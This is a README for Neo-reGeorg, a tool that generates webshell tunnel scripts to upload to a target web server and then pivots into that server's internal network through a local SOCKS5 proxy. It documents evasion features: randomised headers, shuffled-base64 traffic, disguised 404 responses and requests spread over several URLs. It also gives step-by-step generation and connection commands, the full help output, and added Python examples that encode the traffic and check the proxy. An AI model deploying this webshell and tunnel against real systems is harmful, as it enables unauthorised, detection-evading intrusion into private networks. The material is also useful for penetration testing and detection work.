Neo-reGeorg is a project that restructures reGeorg with the aim of:
- Improving the security of the tunnel connection
- Improving usability and avoiding signature-based detection
- Improving the confidentiality of the transferred content
- Solving the known problems of reGeorg and fixing some small bugs
2.4.0 - Change Log
- Content is transferred as base64 with a shuffled alphabet derived from the key (this breaks signature matching on the wire format; it is obfuscation, not encryption, so put the tunnel behind HTTPS if the content must stay confidential)
- The response to GET requests can be customized (for example, masquerading as a 404 page)
- The HTTP header instructions are randomly generated to avoid signature-based detection
- HTTP headers can be customized
- Custom HTTP response code
- Requests are spread randomly over multiple URLs
- DNS resolution on the server node
- Compatible with Python 2 / Python 3
- High compatibility with server environments
- Following pivotnacci, a single SESSION creates multiple TCP connections, to cope with some load-balancing scenarios
- Supports HTTP forwarding, to cope with load-balanced environments
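The "shuffled base64" transfer encoding and its limits, as an added illustration that is not Neo-reGeorg's own code: both ends derive the same permutation of the 64 base64 symbols from the shared key and translate the standard encoding through it, so the body no longer matches a plain-base64 signature. The seeding and shuffle below are an assumption about the construction, not the project's implementation. The second half shows why this is obfuscation rather than encryption: the shuffle is a monoalphabetic substitution, so one observed message with known plaintext recovers the mapping without the key.

```python
"""Base64 with a key-derived shuffled alphabet, and a known-plaintext
recovery of the mapping.

Added example, not Neo-reGeorg's own code. The seeding (random.Random(key))
and the shuffle are assumptions about the construction, not the project's
exact implementation.
"""
import base64
import random
import string

# The standard base64 alphabet; '=' padding is not part of the shuffle.
STD = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"


def derive_alphabet(key: str) -> str:
    """Deterministic permutation of the 64 symbols seeded from the key.

    random.Random hashes str seeds with SHA-512, so the client and the server
    script derive the same alphabet regardless of process or PYTHONHASHSEED.
    """
    chars = list(STD)
    random.Random(key).shuffle(chars)
    return "".join(chars)


def encode(data: bytes, key: str) -> str:
    """Standard base64, then symbol-for-symbol translation into the shuffled alphabet."""
    table = str.maketrans(STD, derive_alphabet(key))
    return base64.b64encode(data).decode("ascii").translate(table)


def decode(text: str, key: str) -> bytes:
    """Inverse of encode(): translate back to the standard alphabet, then b64decode."""
    table = str.maketrans(derive_alphabet(key), STD)
    return base64.b64decode(text.translate(table))


def recover_mapping(known_plain: bytes, observed: str) -> dict:
    """Known-plaintext attack on the shuffle.

    Because every symbol is replaced independently, aligning the standard
    base64 of a known plaintext with the observed message reveals the
    substitution for every symbol that message contains. No key is needed.
    """
    std_text = base64.b64encode(known_plain).decode("ascii")
    return {o: s for s, o in zip(std_text, observed) if s != "="}


def decode_with_mapping(observed: str, mapping: dict) -> bytes:
    """Decode an observed message with a recovered (possibly partial) mapping."""
    missing = {c for c in observed if c != "=" and c not in mapping}
    if missing:
        raise ValueError(f"mapping incomplete for symbols {sorted(missing)}")
    return base64.b64decode("".join(mapping.get(c, c) for c in observed))


if __name__ == "__main__":
    key = "password"
    # Constructed sample: a request whose plaintext an observer could guess.
    sample = b"GET /intranet/admin HTTP/1.1\r\n"
    print(encode(sample, key))
    # An observer who knows one full-coverage plaintext recovers all 64 symbols.
    full = bytes(range(256))
    recovered = recover_mapping(full, encode(full, key))
    print(len(recovered), decode_with_mapping(encode(sample, key), recovered))
```

The practical consequence: the shuffled alphabet stops naive signature matching, but any party who can pair one tunnel message with its plaintext (a predictable handshake, for instance) reads every later message. Confidentiality has to come from TLS on the HTTP(S) layer.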
Requirements
- [requests] - https://github.com/kennethreitz/requests
Usage
- Step 1. Set the password to generate the tunnel server script (aspx|ashx|jsp|jspx|php) and upload it to the web server.

```
$ python neoreg.py generate -k password
[+] Create neoreg server files:
   => neoreg_servers/tunnel.jspx
   => neoreg_servers/tunnel_compatibility.jspx
   => neoreg_servers/tunnel.php
   => neoreg_servers/tunnel.ashx
   => neoreg_servers/tunnel.aspx
   => neoreg_servers/tunnel.jsp
   => neoreg_servers/tunnel_compatibility.jsp
```
- Step 2. Use neoreg.py to connect to the web server and create a SOCKS5 proxy locally.

```
$ python3 neoreg.py -k password -u http://xx/tunnel.php
+------------------------------------------------------------------------+
  Log Level set to [DEBUG]
  Starting socks server [127.0.0.1:1080]
  Tunnel at:
    http://xx/tunnel.php
+------------------------------------------------------------------------+
```

Note that if your tool (nmap, for example) does not support a SOCKS5 proxy, use proxychains.
- The generated server can answer direct requests with a specified page (such as a disguised 404 page). Connect with --skip so the client does not run its usability test against that disguised page.

```
$ python neoreg.py generate -k <you_password> --file 404.html
$ python neoreg.py -k <you_password> -u <server_url> --skip
```
- If the target web server is only reachable through a proxy, set it with --proxy:

```
$ python neoreg.py -k <you_password> -u <server_url> --proxy socks5://10.1.1.1:8080
```
- To set an Authorization header, or any other custom header or Cookie:

```
$ python neoreg.py -k <you_password> -u <server_url> -H 'Authorization: cm9vdDppcyB0d2VsdmU=' --cookie "key=value;key2=value2"
```
- To spread requests across several paths (after uploading to multiple paths, or with a memory webshell), pass several URLs:

```
$ python neoreg.py -k <you_password> -u <url_1> -u <url_2> -u <url_3> ...
```
- Turn on HTTP forwarding to cope with load balancing (jsp(x) servers only, see -r in the help below):

```
$ python neoreg.py -k <you_password> -u <url> -r <redirect_url>
```
- For the performance and stability parameters, refer to the -h help output.
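A quick sanity check of the local listener that Step 2 opens, as an added example that is not part of Neo-reGeorg: it speaks the SOCKS5 handshake (RFC 1928) from plain Python sockets, sends the destination as a domain name (ATYP 0x03) so that name resolution is left to the far end of the tunnel, and reports the proxy's reply code when a CONNECT fails. The fake in-process SOCKS5 server, the host name `intranet.example` and the echoed payload are constructed so the script runs offline; point `check_tunnel()` at `("127.0.0.1", 1080)` to probe a real neoreg listener.

```python
"""Sanity-check a SOCKS5 listener (RFC 1928) from plain Python sockets.

Added example, not Neo-reGeorg's own code. start_fake_proxy() is a
constructed stand-in for the local listener so the demo runs offline;
the host name and payload are made up.
"""
import socket
import struct
import threading

# Reply codes from RFC 1928 section 6.
REPLY_TEXT = {
    0: "succeeded", 1: "general SOCKS server failure", 2: "not allowed by ruleset",
    3: "network unreachable", 4: "host unreachable", 5: "connection refused",
    6: "TTL expired", 7: "command not supported", 8: "address type not supported",
}


def recv_exact(sock, n):
    """Read exactly n bytes or raise; recv() may return short reads."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed during SOCKS5 exchange")
        buf += chunk
    return buf


def socks5_connect(proxy, dest_host, dest_port, timeout=5.0):
    """Open a TCP stream to dest_host:dest_port through proxy=(host, port).

    The destination is sent as ATYP=0x03 (domain name), so the proxy, not this
    client, resolves it. Through neoreg that means the tunnel server resolves
    intranet names (unless --local-dns is used).
    """
    s = socket.create_connection(proxy, timeout=timeout)
    try:
        s.sendall(b"\x05\x01\x00")                      # VER=5, one method: no auth
        ver, method = recv_exact(s, 2)
        if ver != 5 or method != 0:
            raise ConnectionError("proxy did not accept the no-auth method")
        name = dest_host.encode("idna")
        s.sendall(b"\x05\x01\x00\x03" + bytes([len(name)]) + name
                  + struct.pack("!H", dest_port))        # CMD=CONNECT, ATYP=domain
        ver, rep, _rsv, atyp = recv_exact(s, 4)
        if rep != 0:
            raise ConnectionError(f"CONNECT failed: {REPLY_TEXT.get(rep, rep)}")
        # Consume BND.ADDR and BND.PORT; their contents are not needed here.
        if atyp == 1:
            recv_exact(s, 4)
        elif atyp == 3:
            recv_exact(s, recv_exact(s, 1)[0])
        elif atyp == 4:
            recv_exact(s, 16)
        else:
            raise ConnectionError(f"unknown ATYP {atyp}")
        recv_exact(s, 2)
        return s
    except Exception:
        s.close()
        raise


def check_tunnel(proxy, dest_host, dest_port, payload=b"ping"):
    """Send payload through the proxy and return whatever comes back (same length)."""
    with socks5_connect(proxy, dest_host, dest_port) as s:
        s.sendall(payload)
        return recv_exact(s, len(payload))


def start_fake_proxy(refuse_port=81):
    """Constructed stand-in for a SOCKS5 listener: accepts CONNECT to any name,
    echoes the first packet back, and answers 'connection refused' for refuse_port.
    Returns the port it listens on (127.0.0.1)."""
    lst = socket.socket()
    lst.bind(("127.0.0.1", 0))
    lst.listen(5)

    def handle(conn):
        with conn:
            recv_exact(conn, recv_exact(conn, 2)[1])      # method list
            conn.sendall(b"\x05\x00")
            _ver, _cmd, _rsv, atyp = recv_exact(conn, 4)
            recv_exact(conn, {1: 4, 4: 16}.get(atyp) or recv_exact(conn, 1)[0])
            port = struct.unpack("!H", recv_exact(conn, 2))[0]
            if port == refuse_port:
                conn.sendall(b"\x05\x05\x00\x01" + bytes(6))
                return
            conn.sendall(b"\x05\x00\x00\x01" + bytes(6))
            conn.sendall(conn.recv(4096))

    def serve():
        while True:
            try:
                conn, _ = lst.accept()
            except OSError:
                return
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return lst.getsockname()[1]


def demo():
    """Offline run against the fake proxy: one successful echo, one refused CONNECT."""
    proxy = ("127.0.0.1", start_fake_proxy(refuse_port=81))
    echoed = check_tunnel(proxy, "intranet.example", 80, b"ping")
    try:
        socks5_connect(proxy, "intranet.example", 81)
        refused = None
    except ConnectionError as exc:
        refused = str(exc)
    return echoed, refused


if __name__ == "__main__":
    print(demo())
```

When a real check fails, the reply code is the useful signal: "host unreachable" or "connection refused" comes from the tunnel server's side of the pivot, whereas a closed or rejected handshake on 127.0.0.1 means the local listener itself is not up.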
```
# Generate server-side scripts
$ python neoreg.py generate -h
usage: neoreg.py [-h] -k KEY [-o DIR] [-f FILE] [-c CODE] [--read-buff Bytes]

Generate neoreg webshell

optional arguments:
  -h, --help            show this help message and exit
  -k KEY, --key KEY     Specify connection key.
  -o DIR, --outdir DIR  Output directory.
  -f FILE, --file FILE  Camouflage html page file
  -c CODE, --httpcode CODE
                        Specify HTTP response code. When using -r, it is
                        recommended to <400. (default: 200)
  --read-buff Bytes     Remote read buffer. (default: 513)
```
```
# Connection server
$ python neoreg.py -h
usage: neoreg.py [-h] -u URI [-r URL] -k KEY [-l IP] [-p PORT] [-s] [-H LINE]
                 [-c LINE] [-x LINE] [--local-dns] [--read-buff Bytes]
                 [--read-interval MS] [--max-threads N] [-v]

Socks server for Neoreg HTTP(s) tunneller. DEBUG MODE: -k
(debug_all|debug_base64|debug_headers_key|debug_headers_values)

optional arguments:
  -h, --help            show this help message and exit
  -u URI, --url URI     The url containing the tunnel script
  -r URL, --redirect-url URL
                        Intranet forwarding the designated server (only
                        jsp(x))
  -k KEY, --key KEY     Specify connection key
  -l IP, --listen-on IP
                        The default listening address.(default: 127.0.0.1)
  -p PORT, --listen-port PORT
                        The default listening port.(default: 1080)
  -s, --skip            Skip usability testing
  -H LINE, --header LINE
                        Pass custom header LINE to server
  -c LINE, --cookie LINE
                        Custom init cookies
  -x LINE, --proxy LINE
                        Proto://host[:port] Use proxy on given port
  --local-dns           Use local resolution DNS
  --read-buff Bytes     Local read buffer, max data to be sent per
                        POST.(default: 2048 max: 2600)
  --read-interval MS    Read data interval in milliseconds.(default: 100)
  --max-threads N       Proxy max threads.(default: 1000)
  -v                    Increase verbosity level (use -vv or more for greater
                        effect)
```
TODO
- HTTP body steganography
- Transfer Target field steganography

License: GPL 3.0